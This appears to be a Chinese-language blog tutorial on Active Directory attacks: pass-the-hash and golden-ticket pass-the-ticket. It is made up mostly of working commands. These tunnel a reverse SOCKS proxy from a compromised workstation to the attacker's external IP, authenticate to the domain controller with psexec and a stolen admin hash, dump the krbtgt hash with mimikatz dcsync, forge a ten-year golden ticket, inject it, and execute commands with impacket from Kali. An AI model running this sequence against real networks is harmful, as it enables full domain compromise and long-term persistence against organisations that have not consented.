pass the hash & pass the ticket

一、pass the hash

环境如下:

域控:192.168.3.88

普通域用户电脑:192.168.3.50

渗透测试人员:外网IP

前提:已经获取到域管 hash。

通过socks隧道传递流量

本机执行

./ew_for_linux64 -s rcsocks -l 1008 -e 888

普通域用户电脑执行

ew_for_Win.exe -s rssocks -d xxx.xxx.xxx.x(渗透测试人员IP) -e 888

本机将proxychains DNS配置注释

gedit /etc/proxychains.conf 

《pass the hash & pass the ticket》

在最后一行加入

socks5 127.0.0.1 1008

修改一下本机的hosts

gedit /etc/hosts

《pass the hash & pass the ticket》

最后本机执行

proxychains psexec.py www.exploit.com/administrator@192.168.3.88 -hashes AAD3B435B51404EEAAD3B435B51404EE:DA6FAAD18EC1F32273B103BB93F6E739

《pass the hash & pass the ticket》

《pass the hash & pass the ticket》

二、pass the ticket

windows环境

条件

krbtgt用户哈希
域SID
用户名(域管理员)
域名

先导出krbtgt用户的hash

lsadump::dcsync /domain:z3r0.com /user:krbtgt exit

《pass the hash & pass the ticket》

当前sid

S-1-5-21-407751361-567583359-960223070

《pass the hash & pass the ticket》

使用krbtgt-aes256构造凭证

mimikatz # kerberos::golden /domain:www.exploit.com /sid:S-1-5-21-2004856312-292
8937096-2895403271 /aes256:3d1bc66a4d237559218110b38bcfd02d9317fab8287841cd0e1f6
e3064f4131c /user:admnistrator /ticket:gold.kirbi

《pass the hash & pass the ticket》

或使用krbtgt-ntlm值构造票据

kerberos::golden /domain:z3r0.com /sid:S-1-5-21-407751361-567583359-960223070 /krbtgt:a5e7a102c81780d803aec2013d29f83a /user:admnistrator /ticket:ntlm.kirbi

运行后会在当前目录生成一张票

然后用mimikatz伪造凭证

kerberos::ptt C:Userstomcat.WWWDesktopmimikatz_trunkx64gold.kirbi

票据的有效期为10年

成功拥有域管理员权限

《pass the hash & pass the ticket》

可以通过psexec等工具在任意域内机器上执行命令

《pass the hash & pass the ticket》

《pass the hash & pass the ticket》

linux环境(IP变了和上面环境不同)

首先构造票据

root@kali:~/tools/impacket/examples# python ticketer.py -nthash d5e324180b99f43bc578dc54bed16573 -domain-sid S-1-5-21-3112130590-9669671-206853883 -domain z3r0.com administrator

《pass the hash & pass the ticket》

再添加环境变量

root@kali:~/tools/impacket/examples# pwd
/root/tools/impacket/examples
root@kali:~/tools/impacket/examples# export KRB5CCNAME=/root/tools/impacket/examples/administrator.ccache
root@kali:~/tools/impacket/examples# echo $KRB5CCNAME
/root/tools/impacket/examples/administrator.ccache

《pass the hash & pass the ticket》

最后就可以用impacket里的工具进行连接了

python smbexec.py administrator@WIN-7EF724SF4OF.z3r0.com -k -no-pass

注意这里不要使用ip

《pass the hash & pass the ticket》

原创文章,作者:M0tto1n,如若转载,请注明出处:http://www.mottoin.com/tools/113408.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code